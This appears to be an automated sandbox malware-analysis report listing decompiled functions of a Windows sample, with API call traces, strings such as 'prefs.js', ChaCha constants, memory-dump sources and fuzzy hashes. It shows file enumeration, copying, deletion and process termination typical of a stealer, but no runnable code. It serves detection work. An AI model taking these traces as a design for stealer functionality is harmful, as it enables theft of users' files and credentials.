                                            Function 004140F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wsprintfA.USER32 ref: 00414113
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0041412A
                                            • StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
                                            • StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
                                            • FindClose.KERNEL32(000000FF), ref: 004142D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\%s
                                            • API String ID: 180737720-4073750446
                                            • Opcode ID: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                            • Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
                                            • Opcode Fuzzy Hash: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                            • Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59
                                            Function 02464A27 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02464A37
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02464A3E
                                            • wsprintfA.USER32 ref: 02464A5D
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02464A74
                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 02464AA2
                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 02464AB8
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 02464B42
                                            • FindClose.KERNEL32(000000FF), ref: 02464B57
                                            • lstrcat.KERNEL32(?,006D6F24), ref: 02464B7C
                                            • lstrcat.KERNEL32(?,006D6C2C), ref: 02464B8F
                                            • lstrlen.KERNEL32(?), ref: 02464B9C
                                            • lstrlen.KERNEL32(?), ref: 02464BAD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                            • String ID:
                                            • API String ID: 671575355-0
                                            • Opcode ID: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                            • Instruction ID: bf62fe5eb109ae445943dcf6904a98396da2749920c0b698165030790188f201
                                            • Opcode Fuzzy Hash: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                            • Instruction Fuzzy Hash: 925169B1944218ABCB24EB70DC88FE9737DAF58700F4046CAF64D96190EB759784CF52
                                            Function 02464357 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wsprintfA.USER32 ref: 0246437A
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02464391
                                            • StrCmpCA.SHLWAPI(?,00420F94), ref: 024643BF
                                            • StrCmpCA.SHLWAPI(?,00420F98), ref: 024643D5
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 02464523
                                            • FindClose.KERNEL32(000000FF), ref: 02464538
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                            • Instruction ID: 46082b5afaf0d3f8c382e95d9bd7f92e58e94091df78a8412e1c5dfd68b37a2e
                                            • Opcode Fuzzy Hash: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                            • Instruction Fuzzy Hash: 155154B1904228ABCB24EB70DD89EFA737DBF54300F4446CEB64996050EB759B88CF51
                                            Function 0040EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wsprintfA.USER32 ref: 0040EE3E
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
                                            • StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
                                            • StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
                                            • FindClose.KERNEL32(000000FF), ref: 0040F3C3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\*.*
                                            • API String ID: 180737720-1013718255
                                            • Opcode ID: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
                                            • Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
                                            • Opcode Fuzzy Hash: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
                                            • Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59
                                            Function 0248F4FF Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                            • API String ID: 0-1562099544
                                            • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                            • Instruction ID: 919dcdaddd5eab065bb3107cefc1fd4e263cd5fdb2a8e5fcdfae6892e423397b
                                            • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                            • Instruction Fuzzy Hash: 2FE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                            Function 0040DF10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
                                            • StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
                                            • FindClose.KERNEL32(000000FF), ref: 0040E4F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                            • String ID: 4@$\*.*
                                            • API String ID: 2325840235-1993203227
                                            • Opcode ID: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
                                            • Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
                                            • Opcode Fuzzy Hash: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
                                            • Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A
                                            Function 0040F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
                                            • StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
                                            • StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FBB1
                                            • FindClose.KERNEL32(000000FF), ref: 0040FBC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID: prefs.js
                                            • API String ID: 3334442632-3783873740
                                            • Opcode ID: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
                                            • Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
                                            • Opcode Fuzzy Hash: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
                                            • Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A
                                            Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,00401F6C,?,004252EC,?,?,00000000,?,00000000), ref: 00401963
                                            • StrCmpCA.SHLWAPI(?,00425394), ref: 004019B3
                                            • StrCmpCA.SHLWAPI(?,0042543C), ref: 004019C9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
                                            • DeleteFileA.KERNEL32(00000000), ref: 00401E0A
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
                                            • FindClose.KERNEL32(000000FF), ref: 00401E72
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                            • String ID: \*.*
                                            • API String ID: 1415058207-1173974218
                                            • Opcode ID: 15f4b34df85bfc17be5ad473dee7c45c6665dc634d808535e379f0e4dc2031a1
                                            • Instruction ID: a576ed9f26fd673c6d53a896fc8188a2a0655e62510251b9f9068b5a07b58df1
                                            • Opcode Fuzzy Hash: 15f4b34df85bfc17be5ad473dee7c45c6665dc634d808535e379f0e4dc2031a1
                                            • Instruction Fuzzy Hash: 45125071A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9
                                            Function 0245F087 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wsprintfA.USER32 ref: 0245F0A5
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0245F0BC
                                            • StrCmpCA.SHLWAPI(?,00421630), ref: 0245F112
                                            • StrCmpCA.SHLWAPI(?,00421634), ref: 0245F128
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245F615
                                            • FindClose.KERNEL32(000000FF), ref: 0245F62A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                            • Instruction ID: fb6c3bf2f5e24e4617d5225079a52fc444f58763757f03723ea5b596cd3d3174
                                            • Opcode Fuzzy Hash: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                            • Instruction Fuzzy Hash: 7BE1ED72901628AADB18EB61DC58EFE733AAF54301F4045EEA44A72091EF305F89CF52
                                            Function 0040DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
                                            • StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
                                            • StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DECC
                                            • FindClose.KERNEL32(000000FF), ref: 0040DEDE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
                                            • Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
                                            • Opcode Fuzzy Hash: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
                                            • Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A
                                            Function 0245DDE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0245DE52
                                            • StrCmpCA.SHLWAPI(?,004215AC), ref: 0245DE9A
                                            • StrCmpCA.SHLWAPI(?,004215B0), ref: 0245DEB0
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245E133
                                            • FindClose.KERNEL32(000000FF), ref: 0245E145
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                            • Instruction ID: 49a280d372716c7df81026523be2b6183a80364afa1a95f03732ab9e52a14c5c
                                            • Opcode Fuzzy Hash: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                            • Instruction Fuzzy Hash: 8D913572A00624ABCB14FBB5DD59DFD737AAF94301F0045AEE84A66150EE349B48CF92
                                            Function 0245FA17 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0245FA85
                                            • StrCmpCA.SHLWAPI(?,004216B4), ref: 0245FAD6
                                            • StrCmpCA.SHLWAPI(?,004216B8), ref: 0245FAEC
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245FE18
                                            • FindClose.KERNEL32(000000FF), ref: 0245FE2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                            • Instruction ID: 0cca93f6508a03ef29d3dc19e33248bff747394d86b89daa1d7ac699b309dc57
                                            • Opcode Fuzzy Hash: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                            • Instruction Fuzzy Hash: F4B120719006289BCB28FB65DC98EFE737AAF55300F4045AED84A66151EF309F49CF92
                                            Function 004198E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
                                            • Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
                                            • Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
                                            • StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
                                            • CloseHandle.KERNEL32(00000000), ref: 00419987
                                            • CloseHandle.KERNEL32(00409FDE), ref: 00419993
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
                                            • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91
                                            Function 02469B47 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02469B6C
                                            • Process32First.KERNEL32(0245A245,00000128), ref: 02469B80
                                            • Process32Next.KERNEL32(0245A245,00000128), ref: 02469B95
                                            • StrCmpCA.SHLWAPI(?,0245A245), ref: 02469BAA
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02469BC3
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 02469BE1
                                            • CloseHandle.KERNEL32(00000000), ref: 02469BEE
                                            • CloseHandle.KERNEL32(0245A245), ref: 02469BFA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction ID: 0ff963e2fb10c29b549f4fe5e5cf71e4c114fd9692c86f4b87961af37d2f3ea8
                                            • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                            • Instruction Fuzzy Hash: F0111F75D05219EBCB24DFA5DC88BEE7779BB48704F008589F505A6240E7749B84CF51
                                            Function 0040E530 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
                                            • StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
                                            • StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
